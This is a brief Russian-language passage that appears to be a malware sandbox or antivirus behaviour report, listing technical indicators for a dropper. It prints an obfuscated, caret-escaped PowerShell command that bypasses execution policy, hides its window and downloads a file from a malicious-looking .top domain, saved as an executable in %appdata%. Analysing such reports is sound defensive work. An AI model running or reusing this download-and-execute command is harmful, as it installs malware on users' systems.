Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWeRSHeLl.E^xE ^-e^xec^ut^I^Onp^o^LiCy bYpASs ^-nOP^Ro^F^iLE -W^inDowStYL^e H^Id^dE^N^ (^NE^W^-^oB^JeCT SYS^t^e^m^.N^ET^.^w^E^BC^LIen^t).^DO^wNLoADFil^e^('http://monday...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "PoWeRSHeLl.E^xE ^-e^xec^ut^I^Onp^o^LiCy bYpASs ^-nOP^Ro^F^iLE -W^inDowStYL^e H^Id^dE^N^ (^NE^W^-^oB^JeCT SYS^t^e^m^.N^ET^.^w^E^BC^LIen^t).^DO^wNLoADFil^e^('http://monday...' (со скрытым окном)